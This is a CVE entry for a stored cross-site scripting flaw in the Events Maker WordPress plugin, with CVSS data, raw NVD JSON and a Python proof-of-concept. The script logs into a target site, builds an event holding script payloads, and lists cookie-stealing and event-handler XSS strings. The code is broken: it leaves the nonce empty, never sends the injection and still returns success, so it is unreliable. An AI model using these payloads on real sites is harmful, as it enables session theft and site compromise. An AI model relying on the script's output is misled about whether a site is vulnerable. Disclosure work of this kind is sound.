Security Vulnerability Report
中文
CVE-2025-62941 CVSS 6.5 MEDIUM

CVE-2025-62941

Published: 2025-10-27 02:15:54
Last Modified: 2026-04-27 17:16:36

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Events Maker by dFactory events-maker allows Stored XSS.This issue affects Events Maker by dFactory: from n/a through <= 1.6.14.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Events Maker by dFactory <= 1.6.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62941 PoC - Stored XSS in Events Maker WordPress Plugin # Target: WordPress site with Events Maker plugin <= 1.6.14 def exploit_stored_xss(target_url, username, password, xss_payload): """ Exploit stored XSS vulnerability in Events Maker plugin Args: target_url: Base URL of WordPress site username: WordPress username with contributor+ role password: WordPress password xss_payload: Malicious JavaScript payload to inject """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Create new event with XSS payload # Find nonce for event creation admin_url = f"{target_url}/wp-admin/admin.php?page=events-maker#/add-event" # Event creation data with XSS payload event_data = { 'action': 'eme_insert_event', 'event_name': xss_payload, 'event_description': f"<script>alert('XSS by {xss_payload}')</script>", 'event_start_date': '2025-12-01', 'event_end_date': '2025-12-01', 'event_status': 'publish', '_wpnonce': '', # Need to extract from page '_wp_http_referer': admin_url } # Common XSS payloads to test: # <script>alert(document.cookie)</script> # <img src=x onerror=alert(1)> # <svg onload=alert('XSS')> # <iframe src="javascript:alert('XSS')"> print(f"[*] Injecting XSS payload: {xss_payload}") # Step 3: Trigger XSS by accessing event page # The XSS will execute when admin views the event list return True def verify_vulnerability(target_url): """ Verify if target is vulnerable """ # Check if Events Maker plugin is installed plugins_url = f"{target_url}/wp-content/plugins/events-maker/" response = requests.get(plugins_url) if response.status_code == 200: print("[+] Events Maker plugin detected") return True else: print("[-] Events Maker plugin not found") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [username] [password]") print("Example: python CVE-2025-62941.py http://target.com admin password") sys.exit(1) target = sys.argv[1] user = sys.argv[2] if len(sys.argv) > 2 else "admin" pwd = sys.argv[3] if len(sys.argv) > 3 else "password" # XSS payload xss_payload = '<script>alert(document.domain)</script>' if verify_vulnerability(target): exploit_stored_xss(target, user, pwd, xss_payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62941", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:54.150", "lastModified": "2026-04-27T17:16:36.467", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Events Maker by dFactory events-maker allows Stored XSS.This issue affects Events Maker by dFactory: from n/a through <= 1.6.14."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/events-maker/vulnerability/wordpress-events-maker-by-dfactory-plugin-1-6-14-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}